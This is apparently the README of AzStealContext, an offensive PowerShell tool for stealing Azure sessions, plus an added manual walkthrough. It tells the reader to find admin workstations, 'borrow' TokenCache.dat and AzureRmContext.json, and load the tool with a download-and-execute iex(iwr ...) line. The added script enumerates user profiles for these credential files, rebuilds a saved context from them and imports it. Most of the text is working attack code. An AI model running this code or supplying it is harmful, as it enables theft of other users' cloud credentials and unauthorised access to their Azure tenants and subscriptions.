A PowerShell function that automates stealing the Azure context from a user's `.Azure` folder.

When a user uses the Az PowerShell module, a `.Azure` folder is created in the user's home folder. This folder contains multiple files, including `AzureRmContext.json` and `TokenCache.dat`. If the user has authenticated with the `Connect-AzAccount` cmdlet, these files contain all the information an attacker needs to create an 'AzContext' file equivalent to the output of the `Save-AzContext` cmdlet. This PowerShell function automates the steps an attacker would otherwise take by hand to create such an 'AzContext' file.

The `AzureRmContext.json` file can hold multiple 'contexts'. This happens when `Connect-AzAccount` is run multiple times by the same user with different Azure credentials. The function checks whether there are multiple contexts and, if so, asks you which one to use as the default context.
- Find an admin workstation or user profile that has the `.Azure` folder.
- 'Borrow' the `TokenCache.dat` and `AzureRmContext.json` files.
- Load this function:

```powershell
iex((iwr https://raw.githubusercontent.com/justin-p/AzStealContext/master/Invoke-AzStealContext.ps1).content)
```

- Run the function:
  - To prepare an AzContext file:

    ```powershell
    Invoke-AzStealContext -Path 'Path\To\Borrowed\Files'
    ```

  - To prepare and import an AzContext file:

    ```powershell
    Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -ImportContext
    ```

  - To prepare and import an AzContext file, overwriting an existing OutFile:

    ```powershell
    Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -ImportContext -Force
    ```

  - To change the default OutFile name:

    ```powershell
    Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -OutFile 'CustomFilename.json'
    ```
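The steps above (locate a `.Azure` folder, borrow the two files, pick one of possibly several contexts, and write a `Save-AzContext`-style file) can be walked through by hand. The following is an added example written for this page; it is not the `Invoke-AzStealContext` function itself and does not reproduce its code. It assumes the `AzureRmContext.json` layout of the Az module versions that wrote `TokenCache.dat` (a top-level `DefaultContextKey`, a `Contexts` dictionary keyed by context name, `EnvironmentTable` and `ExtendedProperties`) and that `Save-AzContext` emits the same layout with the token cache embedded as base64 in `TokenCache.CacheData`. The function names `Find-AzureFolders`, `Get-BorrowedContexts` and `New-BorrowedAzContext`, and the `C:\loot\...` paths, are hypothetical.

```powershell
# Added example, not the AzStealContext project's code.
# Assumed AzureRmContext.json layout (an assumption, verify on the Az version in use):
#   { "DefaultContextKey": "<key>",
#     "EnvironmentTable": {...},
#     "Contexts": { "<key>": { "Account": {"Id":..}, "Tenant": {"Id":..},
#                              "Subscription": {"Id":..,"Name":..},
#                              "TokenCache": {"CacheData": null}, ... } },
#     "ExtendedProperties": {...} }

function Find-AzureFolders {
    # Enumerate user profiles on this host whose .Azure folder holds both
    # files the technique needs (step 1 of the README procedure).
    param([string]$ProfileRoot = (Split-Path $env:USERPROFILE -Parent))
    Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue |
        ForEach-Object {
            $az  = Join-Path $_.FullName '.Azure'
            $ctx = Join-Path $az 'AzureRmContext.json'
            $tc  = Join-Path $az 'TokenCache.dat'
            if ((Test-Path $ctx) -and (Test-Path $tc)) {
                [pscustomobject]@{ User = $_.Name; ContextFile = $ctx; TokenCacheFile = $tc }
            }
        }
}

function Get-BorrowedContexts {
    # List every context in a borrowed AzureRmContext.json so the operator
    # can choose one; the file holds several when Connect-AzAccount was run
    # with different credentials.
    param([Parameter(Mandatory)][string]$ContextFile)
    $json = Get-Content -Path $ContextFile -Raw | ConvertFrom-Json
    foreach ($prop in $json.Contexts.PSObject.Properties) {
        $c = $prop.Value
        [pscustomobject]@{
            Key          = $prop.Name
            IsDefault    = ($prop.Name -eq $json.DefaultContextKey)
            Account      = $c.Account.Id
            Tenant       = $c.Tenant.Id
            Subscription = $c.Subscription.Name
        }
    }
}

function New-BorrowedAzContext {
    # Build a Save-AzContext-style file: keep only the chosen context, make it
    # the default, and embed TokenCache.dat (base64) as TokenCache.CacheData.
    param(
        [Parameter(Mandatory)][string]$ContextFile,
        [Parameter(Mandatory)][string]$TokenCacheFile,
        [string]$ContextKey,                    # defaults to the file's DefaultContextKey
        [string]$OutFile = 'AzContext.json',
        [switch]$Force                          # overwrite an existing OutFile
    )
    if ((Test-Path $OutFile) -and -not $Force) {
        throw "$OutFile already exists; use -Force to overwrite it"
    }
    $json = Get-Content -Path $ContextFile -Raw | ConvertFrom-Json
    if (-not $ContextKey) { $ContextKey = $json.DefaultContextKey }
    $chosen = $json.Contexts.$ContextKey
    if (-not $chosen) { throw "No context named '$ContextKey' in $ContextFile" }

    # The on-disk profile keeps the token cache in TokenCache.dat; the saved
    # context expects it inline, base64 encoded (assumed layout).
    $cacheB64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes($TokenCacheFile))
    $chosen | Add-Member -NotePropertyName TokenCache `
                         -NotePropertyValue ([pscustomobject]@{ CacheData = $cacheB64 }) -Force

    $profile = [pscustomobject]@{
        DefaultContextKey  = $ContextKey
        EnvironmentTable   = $json.EnvironmentTable
        Contexts           = [pscustomobject]@{ $ContextKey = $chosen }
        ExtendedProperties = $json.ExtendedProperties
    }
    $profile | ConvertTo-Json -Depth 10 | Set-Content -Path $OutFile -Encoding UTF8
    Get-Item -Path $OutFile
}

# Usage (hypothetical paths): list contexts, build the file, then import it.
$contexts = Get-BorrowedContexts -ContextFile 'C:\loot\AzureRmContext.json'
$contexts | Format-Table -AutoSize
New-BorrowedAzContext -ContextFile 'C:\loot\AzureRmContext.json' `
                      -TokenCacheFile 'C:\loot\TokenCache.dat' `
                      -ContextKey $contexts[0].Key -OutFile 'AzContext.json' -Force
Import-AzContext -Path 'AzContext.json'
```

`Get-BorrowedContexts` is the manual equivalent of the "which context do you want?" prompt the function shows; `-ContextKey` is what you would answer. One caveat worth checking before relying on a borrowed `TokenCache.dat`: the Az module versions that wrote this file protected it on Windows with DPAPI in the scope of the user who created it (treat this as an assumption to verify against the exact Az version on the target), and the example embeds the bytes unchanged, so an import as a different user or on a different host may fail even though the context file itself parses and imports.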
Feel free to open issues, contribute and submit your Pull Requests. You can also ping me on Twitter (@JustinPerdok)